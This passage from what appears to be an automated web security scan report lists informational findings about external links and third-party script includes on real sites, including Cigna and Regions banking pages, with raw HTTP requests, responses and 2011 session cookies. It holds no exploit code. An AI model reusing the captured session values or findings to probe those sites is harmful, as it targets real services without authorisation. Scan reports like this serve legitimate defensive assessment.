</div><a id=gb_36 href="http://www.youtube.com/results?q=paperg&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.paperg.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rGKK1eA4ppYJ:www.paperg.com/+paperg&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.paperg.com/company.php" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">About : Company</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.paperg.com/publishers/flyerboard.php" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">Flyerboard</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.paperg.com/contact.php" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Contact</a></div><div class=sld><a class=sla href="http://www.paperg.com/publishers/" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoAzAA')">Publishers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.paperg.com/publishers/placelocal.php" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoBDAA')">PlaceLocal</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.paperg.com/press.php" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoBTAA')">Newsroom</a></div><div class=sld><a class=sla href="http://www.paperg.com/advertisers/" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoBjAA')">Advertisers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.paperg.com/sitemap.php" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoBzAA')">Flyerboard Directory</a>
...[SNIP]...
<h3 class="r"><a href="http://www.paperg.com/company.php" class=l onmousedown="return clk(this.href,'','','','2','','0CCcQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:JKPn_QUClQIJ:www.paperg.com/company.php+paperg&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCwQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.paperg.com/team.php" class=l onmousedown="return clk(this.href,'','','','3','','0CC4QFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2yKdMxkuZ-QJ:www.paperg.com/team.php+paperg&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDMQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.paperg.com/publishers/placelocal.php" class=l onmousedown="return clk(this.href,'','','','4','','0CDUQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-9szhkqvnsAJ:www.paperg.com/publishers/placelocal.php+paperg&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDoQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://twitter.com/paperg" class=l onmousedown="return clk(this.href,'','','','5','','0CD0QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0s20vYRYK7QJ:twitter.com/paperg+paperg&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEIQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/company/paperg" class=l onmousedown="return clk(this.href,'','','','6','','0CEQQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0vuSjcgBdVYJ:www.crunchbase.com/company/paperg+paperg&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEsQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://venturebeat.com/2009/06/11/paperg-the-right-local-ad-solution-for-struggling-newspapers/" class=l onmousedown="return clk(this.href,'','','','7','','0CE0QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:b0F7CEipLEoJ:venturebeat.com/2009/06/11/paperg-the-right-local-ad-solution-for-struggling-newspapers/+paperg&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFIQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://paidcontent.org/article/419-hyperlocal-ad-firm-paperg-raises-1.1-million-third-round/" class=l onmousedown="return clk(this.href,'','','','8','','0CFQQFjAH')">Hyperlocal Ad Firm <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:fsWNBhBAtEQJ:paidcontent.org/article/419-hyperlocal-ad-firm-paperg-raises-1.1-million-third-round/+paperg&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://techcrunch.com/tag/paperg/" class=l onmousedown="return clk(this.href,'','','','9','','0CFsQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-GE6eCMWkZkJ:techcrunch.com/tag/paperg/+paperg&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGAQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.flyerboard.com/" class=l onmousedown="return clk(this.href,'','','','10','','0CGEQFjAJ')">Flyerboard | Online Community Bulletin Board | by <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uYZpNfFLJvwJ:www.flyerboard.com/+paperg&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGYQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.chron.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CGkQoggwCg')">chron.com</a>
...[SNIP]...
<div><a href="http://www.ultimatebaytown.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CGsQoggwCw')">ultimate Baytown</a>
...[SNIP]...
<div><a href="http://www.ultimatebellaire.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CG0QoggwDA')">ultimate Bellaire</a>
...[SNIP]...
<div><a href="http://www.ultimateeastend.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CG8QoggwDQ')">Ultimate East End</a>
...[SNIP]...
12.6. http://www.mycigna.com/sslreq.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycigna.com
Path:   /sslreq.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sslreq.html?page=/favicon.ico HTTP/1.1
Host: www.mycigna.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD_STATEFUL_e5fd496c-4b84-11e0-9e32-20548964aa77=%2Frte%2Fpublic

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 16 May 2011 15:29:50 GMT
last-modified: Fri, 13 May 2011 17:36:59 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.0.0.3 (Build 060807)
Content-Length: 2075

<html><head><title>myCigna - Error</title>

<META NAME="robots" CONTENT="noindex">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="refresh" CONTENT="10;u
...[SNIP]...
<br>If you are not redirected in 10 seconds please click here: <a href="https://my.cigna.com/web/public/guest">MyCigna</a>
...[SNIP]...
12.7. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/albany-times-union/1552/0.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /flyerboard/albany-times-union/1552/0.html?bid=1552&pid=891&cid=0&view=all&boards%5B%5D=1862&boards%5B%5D=1753&boards%5B%5D=1552 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045; __utmz=1.1305557272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027440590.1305557272.1305557272.1305557272.1; __utmc=1; __utmb=1.1.10.1305557272

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:48:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 5515


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
<div id="header">
           <a href="http://www.timesunion.com/" target="_blank" rel="nofollow" ><div id="sponsor_logo">
...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
12.8. http://www.regions.com/wrapperHeader.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /wrapperHeader.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wrapperHeader.aspx?p=477 HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.regions.com/about_regions/IR_investorrelations.html
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255; WT_FPC=id=2d44ab3f410ebd166681305556924172:lv=1305557331806:ss=1305556924172

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3434604483; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:52:29 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 12625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<li><a href="https://www.planservices.com/regions/" title="1PlanPlus - Participant" target="_blank">1PlanPlus - Participant</a>
...[SNIP]...
<li><a href="https://secure.thepaymentwindow.com/epayments/default.asp?siteId=11165&siteLoc=REG93E8FE78" title="Collections" target="_parent">Collections</a>
...[SNIP]...
<li><a href="https://www.morgankeegan.com/ca/mkca.aspx" title="MK Client Access" target="_blank">MK Client Access</a>
...[SNIP]...
<li><a href="https://mymortgage.regionsmortgage.com/upmb/disp" title="My Mortgage" target="_blank">My Mortgage</a>
...[SNIP]...
<li><a href="https://www.rmktonline.com/weblink" title="Trust Online" target="_blank">Trust Online</a>
...[SNIP]...
<li><a href="https://www.sponsorinsight.com/regions/index.cfm" title="1PlanPlus - Sponsor" target="_blank">1PlanPlus - Sponsor</a>
...[SNIP]...
<li><a href="http://www.inettracer.com/regions_homepage.asp" title="Commercial Card Services" target="_blank">Commercial Card Services</a>
...[SNIP]...
<li><a href="https://www.consumercardaccess.com/main/spectrum/Home" title="Spectrum Card - Employee" target="_blank">Spectrum Card - Employee</a>
...[SNIP]...
<li><a href="https://www.paycardsolutions.com/spectrum" title="Spectrum Card - Employer" target="_blank">Spectrum Card - Employer</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcs4b71fc10000gs8u88h5t1k_6n2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.3"/></div>
...[SNIP]...
12.9. http://www.regionsmortgage.com/Error/Error  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regionsmortgage.com
Path:   /Error/Error

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Error/Error?aspxerrorpath=/favicon.ico HTTP/1.1
Host: www.regionsmortgage.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_uppmt.sfhjpot.dpn-xfc-wjq=ffffffffaf130ef045525d5f4f58455e445a4a423660; NSC_uppmt.sfhjpotnpsuhbhf-xxx=ffffffffaf130d4d45525d5f4f58455e445a4a423660; WT_FPC=id=27375c86d3a48c352621305555465155:lv=1305555465155:ss=1305555465155

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 5156
Content-Length: 5156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>

</title>
...[SNIP]...
<div class="mnuTopLink">
<a href="http://www.regions.com/mortgage.rf">Go to Regions.com</a>
...[SNIP]...
<div class='lmcHeader'><a class='lmcHeaderLink' href='http://www.regions.com/mortgage/information_center.rf' title='Information Center' target='_parent'>Information Center</a>
...[SNIP]...
<div class='lmcHeader'><a class='lmcHeaderLink' href='http://www.regions.com/mortgage/mortgage_programs.rf' title='Mortgage Programs' target='_parent'>Mortgage Programs</a>
...[SNIP]...
<div class='lmcHeader'><a class='lmcHeaderLink' href='http://www.regions.com/mortgage/mortgage_tools.rf' title='Mortgage Tools' target='_parent'>Mortgage Tools</a>
...[SNIP]...
<div class='lmcItems'><a class='lmcLink' href='http://www.regions.com/calculators/mortgage.rf' title='Calculators' target='_parent'>Calculators</a>
...[SNIP]...
<div class='lmcItems'><a class='lmcLink' href='http://www.regions.com/mortgage/rates.rf' title="Today's Mortgage Rates" target="_parent">Today's Mortgage Rates</a>
...[SNIP]...
<div class='lmcItems'><a class='lmcLink' href='http://www.regions.com/mortgage/news_views.rf' title='Mortgage News and Views' target='_parent'>Mortgage News and Views</a>
...[SNIP]...
<div class='lmcHeader'><a class='lmcHeaderLink' href='http://www.regions.com/mortgage/related_services.rf' title='Existing Mortgage Customers' target='_parent'>Existing Mortgage Customers</a>
...[SNIP]...
<img align="Left" alt="Regions Mortgage Equal Housing" class="" id="EqualHousing" src="/App_Themes/PC/Images/equalhousing.gif" />
<a href='http://www.regions.com/personal_banking/ehl.rf' class="fItem" target="_blank">Equal Housing Lender</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcs4b71fc10000gs8u88h5t1k_6n2i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.0.3"/></div>
...[SNIP]...
12.10. http://www.xsnet.com/Portals/64787/footerStuff.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xsnet.com
Path:   /Portals/64787/footerStuff.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Portals/64787/footerStuff.html?_=1305565680528 HTTP/1.1
Host: www.xsnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.xsnet.com/
Cookie: .ASPXANONYMOUS=XJ4onn1KzAEkAAAAMzIwYTQ3NDctN2Q1NC00YjBjLWEzNzctMjU4NmNhMmQ0MDM20; HUBSPOT32=236000428.20480.0000; hubspotutktzo=-5

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 27 Apr 2011 23:50:34 GMT
Accept-Ranges: bytes
ETag: "0c12ce6355cc1:101a8"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 17:08:01 GMT
Content-Length: 1751

   <div class="footerInner">
       <div id="left">
           <ul>
               <li><a href="/it-maintenance-services/">IT Maintenance Services</a></li>
               <li><a href="/datacenter-relocation-services/">Datacenter Relo
...[SNIP]...
</span>
               <a href="http://www.facebook.com/xsnet" class="social facebook"></a>
               <a href="http://twitter.com/xsinternational" class="social twitter"></a>
...[SNIP]...
13. Cross-domain script include  previous  next
There are 50 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

13.1. https://secureapps.regions.com/oao/ErrorPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/ErrorPage.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /oao/ErrorPage.aspx HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreensavings
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:21:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 9876


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
</script> <script src="http://qaappsatregions/oao/scripts/_bt.js" type="text/javascript"></script>
...[SNIP]...
13.2. https://secureapps.regions.com/oao/app01.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/app01.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /oao/app01.aspx?type=prefplus HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Date: Mon, 16 May 2011 15:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; domain=secureapps.regions.com; path=/; secure; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 48498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
</script> <script src="http://qaappsatregions/oao/scripts/_bt.js" type="text/javascript"></script>
...[SNIP]...
13.3. https://secureapps.regions.com/oao/app02.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/app02.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /oao/app02.aspx?type=savings HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=savings
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 76388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
</script> <script src="http://qaappsatregions/oao/scripts/_bt.js" type="text/javascript"></script>
...[SNIP]...
13.4. http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /p/enterprise-exploit-coverage-by-hoyt-llc.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/enterprise-exploit-coverage-by-hoyt-llc.html HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Mon, 16 May 2011 14:32:28 GMT
Date: Mon, 16 May 2011 14:32:28 GMT
Last-Modified: Mon, 16 May 2011 14:20:53 GMT
ETag: "6bfadf56-f9fa-42d5-bd0e-5783c9dc59a9"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Content-Length: 64616

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...
</div>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.blogger.com/static/v1/widgets/4286431867-widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
<script type="text/javascript" src="http://www.google.com/uds/solutions/slideshow/gfslideshow.js"></script>
...[SNIP]...
13.5. http://www.frontrowusa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:22:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Set-Cookie: PHPSESSID=b0i6udgq1j7b7hktoeaq8jt5f5; path=/; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=TrEzfz3M3vjRUEDfKnG7Fykdvryi2PxODTvU1UszaOty9IgiybNfa5"></script>
...[SNIP]...
13.6. http://www.frontrowusa.com/Concerts/U2_Tickets.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /Concerts/U2_Tickets.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Concerts/U2_Tickets.htm HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
Referer: http://www.frontrowusa.com/Sell-Tickets
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
